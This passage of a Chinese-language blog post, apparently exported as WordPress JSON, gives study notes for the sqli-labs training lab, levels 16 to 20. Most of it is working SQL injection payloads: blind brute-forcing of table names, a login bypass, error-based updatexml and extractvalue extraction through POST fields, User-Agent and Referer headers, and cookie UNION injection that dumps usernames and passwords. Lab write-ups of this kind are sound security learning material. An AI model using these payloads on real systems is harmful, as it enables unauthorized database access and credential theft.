information_schema.tables where table_schema =database() limit 3,1),5)='users' --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u529b\u7834\u89e3\u5217\u540d<\/p>\n<pre><code>uname=admin\") and left((select column_name from information_schema.columns where table_name ='users' limit 0,1),2)='id' --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u529b\u7834\u89e3\u5b57\u6bb5<\/p>\n<pre><code>uname=admin\") and left((select username from users limit 0,1),1)='D' --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<h3 id=\"\u65b9\u6cd5\u4e09\u6b6a\u95e8\u90aa\u9053\"><strong>\u65b9\u6cd5\u4e09\uff0c\u6b6a\u95e8\u90aa\u9053\uff1a<\/strong><\/h3>\n<p>\u4e07\u80fd\u8d26\u53f7\u7ed5\u8fc7\u5bc6\u7801\u9a8c\u8bc1\uff1a<\/p>\n<pre><code>admin\")#\n<\/code><\/pre>\n<p>\u6ce8\u5165\u7ed3\u675f\u3002<\/p>\n<h1 id=\"less-17\"><strong>Less-17 <\/strong><\/h1>\n<p><strong>POST &#8211; Update Query- Error Based &#8211; String (\u57fa\u4e8e\u9519\u8bef\u7684\u66f4\u65b0\u67e5\u8be2POST\u6ce8\u5165)<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>\u4f7f\u7528updatexml\uff08\uff09\uff0c\u5b83\u548cextractvaule\uff08\uff09\u662f\u4eb2\u5144\u5f1f<\/p>\n<p>\u7206\u5e93payload<\/p>\n<pre><code>uname=admin&amp;passwd=admin' and updatexml(1,concat(0x7e,database(),0x7e),1) --+&amp;submit=Submit\n<\/code><\/pre>\n<p>\u7206\u8868\u540dpayload<\/p>\n<pre><code>uname=admin&amp;passwd=admin' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+&amp;submit=Submit\n<\/code><\/pre>\n<p>\u7206\u5217\u540dpayload<\/p>\n<pre><code>uname=admin&amp;passwd=admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) --+&amp;submit=Submit\n<\/code><\/pre>\n<p>\u7206\u503cpayload<\/p>\n<pre><code>uname=admin&amp;passwd=11'  and  updatexml(1,concat(0x7e,(select password from (select password from users limit 7,1) test ),0x7e),1) --+&amp;submit=Submit\n<\/code><\/pre>\n<h1 id=\"less-18\"><strong>Less-18<\/strong><\/h1>\n<p><strong>POST &#8211; Header Injection &#8211; Uagent field &#8211; Error based (\u57fa\u4e8e\u9519\u8bef\u7684\u7528\u6237\u4ee3\u7406\uff0c\u5934\u90e8POST\u6ce8\u5165)<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>\u7206\u5e93payload<\/p>\n<pre><code>User-Agent: ' and extractvalue(1,concat(0x7e,database())) and '\n<\/code><\/pre>\n<p>\u66b4\u8868payload<\/p>\n<pre><code>User-Agent: ' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '\n<\/code><\/pre>\n<p>\u66b4\u5b57\u6bb5payload<\/p>\n<pre><code>User-Agent: ' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) and '\n<\/code><\/pre>\n<p>\u66b4\u503cpayload<\/p>\n<pre><code>User-Agent: ' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) and '\n<\/code><\/pre>\n<p>\u672a\u663e\u793a\u5b8c\u5168<\/p>\n<pre><code>User-Agent: ' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','Angelina')))) and '\n<\/code><\/pre>\n<h1 id=\"less-19\"><strong>Less-19<\/strong><\/h1>\n<p><strong>POST &#8211; Header Injection &#8211; Referer field &#8211; Error based (\u57fa\u4e8e\u5934\u90e8\u7684Referer POST\u62a5\u9519\u6ce8\u5165)<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>\u66b4\u5e93payload<\/p>\n<pre><code>Referer: ' and extractvalue(1,concat(0x7e,database())) and '\n<\/code><\/pre>\n<p>\u66b4\u8868<\/p>\n<pre><code>Referer: ' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '\n<\/code><\/pre>\n<p>\u66b4\u5b57\u6bb5<\/p>\n<pre><code>Referer: ' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) and '\n<\/code><\/pre>\n<p>\u66b4\u503c<\/p>\n<pre><code>Referer: ' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) and '\n<\/code><\/pre>\n<p>\u663e\u793a\u672a\u5b8c\u5168<\/p>\n<pre><code>Referer: ' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','Angelina')))) and '\n<\/code><\/pre>\n<h1 id=\"less-20\"><strong>Less-20<\/strong><\/h1>\n<p><strong>POST &#8211; Cookie injections &#8211; Uagent field &#8211; Error based (\u57fa\u4e8e\u9519\u8bef\u7684cookie\u5934\u90e8POST\u6ce8\u5165)<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>\u770b\u5230<strong>cookie\uff1auname=admin<\/strong> \u6ca1\u6bdb\u75c5\u5c31\u662fcookie\u6ce8\u5165\u4e86<\/p>\n<p>\u6293\u6709cookie\u7684\u5305<\/p>\n<p>\u52a0\u5355\u5f15\u53f7<\/p>\n<pre><code>Cookie: uname=admin'\n<\/code><\/pre>\n<p>\u7206\u51fa\u8bed\u6cd5\u9519\u8bef\uff0c\u770b\u5f97\u51fa\u6765\u5c31\u662f\u5355\u5f15\u53f7\u578b\u3002<\/p>\n<p>\u66b4\u5b57\u6bb5\u6570<\/p>\n<pre><code>Cookie: uname=admin' order by 3 --+    \/\/\u6b63\u5e38\n\nCookie: uname=admin' order by 4 --+    \/\/\u62a5\u9519    \u5224\u65ad\u5b57\u6bb5\u6570\u4e3a3\n<\/code><\/pre>\n<p>\u66b4\u5b57\u6bb5\u4f4d\u7f6e<\/p>\n<pre><code>Cookie: uname=-admin'  union select 1,2,3 --+\n<\/code><\/pre>\n<p>\u66b4\u5e93\uff0c\u7248\u672c<\/p>\n<pre><code>Cookie: uname=-admin'  union select version(),database(),3 --+\n<\/code><\/pre>\n<p>\u66b4\u8868\u540d<\/p>\n<pre><code>Cookie: uname=-admin'  union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+\n<\/code><\/pre>\n<p>\u66b4\u5b57\u6bb5<\/p>\n<pre><code>Cookie: uname=-admin'  union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='users' --+\n<\/code><\/pre>\n<p>\u66b4\u5185\u5bb9<\/p>\n<pre><code>Cookie: uname=-admin'  union select 1,2,group_concat(username,password) from users --+\n<\/code><\/pre>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Sqli-labs\u5b66\u4e60\u7b14\u8bb0Less_1-20 Less-1 GET &#8211; Error based &#038; [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[],"class_list":["post-125","post","type-post","status-publish","format-standard","hentry","category-web"],"_links":{"self":[{"href":"https:\/\/daishen.ltd\/index.php?rest_route=\/wp\/v2\/posts\/125","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/daishen.ltd\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/daishen.ltd\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/daishen.ltd\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/daishen.ltd\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=125"}],"version-history":[{"count":1,"href":"https:\/\/daishen.ltd\/index.php?rest_route=\/wp\/v2\/posts\/125\/revisions"}],"predecessor-version":[{"id":126,"href":"https:\/\/daishen.ltd\/index.php?rest_route=\/wp\/v2\/posts\/125\/revisions\/126"}],"wp:attachment":[{"href":"https:\/\/daishen.ltd\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=125"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/daishen.ltd\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=125"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/daishen.ltd\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=125"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}